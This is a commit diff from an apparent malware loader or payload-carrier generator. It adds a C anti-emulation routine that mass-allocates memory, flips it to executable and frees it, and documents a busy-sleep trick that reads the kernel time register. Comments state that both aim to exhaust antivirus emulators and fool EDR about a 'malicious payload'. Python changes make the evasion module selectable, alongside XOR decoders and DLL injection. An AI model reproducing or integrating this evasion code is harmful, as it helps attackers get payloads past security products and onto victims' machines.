refactor: prepare antiemulation more modular

data/source/carrier/antiemulation/sirallocalot.c

@@ -0,0 +1,47 @@
+
+#define ALLOC_NUM 256
+
+
+/* This will allocate ALLOC_NUM RW memory regions, 
+     set them to RX, and free them 
+
+    The idea is that the AV emulator will probably give up, either because
+    of used memory is above maximum, or amount of instructions, or 
+    number of API calls, or time. 
+
+    It hopefully also makes the EDR think this program is doing some
+    kind of interpreter or JIT compilation, and not a malicious payload.
+*/
+
+void antiemulation() {
+    void* allocs[ALLOC_NUM];
+    DWORD result;
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        allocs[n] = VirtualAlloc(
+            NULL, 
+            0x1000, 
+            0x3000, 
+            p_RW
+        );
+    }
+
+    for(int n=0; n<ALLOC_NUM; n++) {
+        if (VirtualProtect(
+            allocs[n], 
+            1000, 
+            p_RX, 
+            &result) == 0) 
+        {
+            return 7;
+        }
+    }
+
+    BOOL bSuccess;
+    for(int n=0; n<ALLOC_NUM; n++) {
+        bSuccess = VirtualFree(
+                        allocs[n],
+                        1000,
+                        0x00008000); // MEM_RELEASE
+    }
+}

data/source/carrier/antiemulation/timeraw.c

@@ -1,4 +1,14 @@
 
+
+/* Busy sleep with time register
+
+    This function will busy sleep for the given amount of time.
+    It uses the kernel time register, which is not affected by
+    the sleep function (memory address 0x7ffe0004).
+
+    This may defeat the AV emulator (maximum time).
+*/
+
 int get_time_raw() {
     ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
     LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;

model/settings.py

@@ -13,6 +13,7 @@ class Settings():
         self.carrier_name: str = ""
         self.decoder_style: DecoderStyle = DecoderStyle.XOR_1
         self.short_call_patching: bool = False
+        self.antiemulation = "timeraw"
 
         self.dllfunc: str = ""  # For DLL injection
 

phases/templater.py

@@ -28,7 +28,8 @@ def create_c_from_template(settings: Settings, payload_len: int):
     plugin_decoder = ""
 
     # Decoder
-    filepath_decoder = PATH_DECODER + "{}.c".format(settings.decoder_style.value)
+    filepath_decoder = PATH_DECODER + "{}.c".format(
+        settings.decoder_style.value)
     with open(filepath_decoder, "r", encoding='utf-8') as file:
         plugin_decoder = file.read()
         plugin_decoder = Template(plugin_decoder).render({
@@ -38,7 +39,8 @@ def create_c_from_template(settings: Settings, payload_len: int):
         })
 
     # Anti-Emulation
-    filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format("timeraw")
+    filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format(
+        settings.antiemulation)
     with open(filepath_antiemulation, "r", encoding='utf-8') as file:
         plugin_antiemualation = file.read()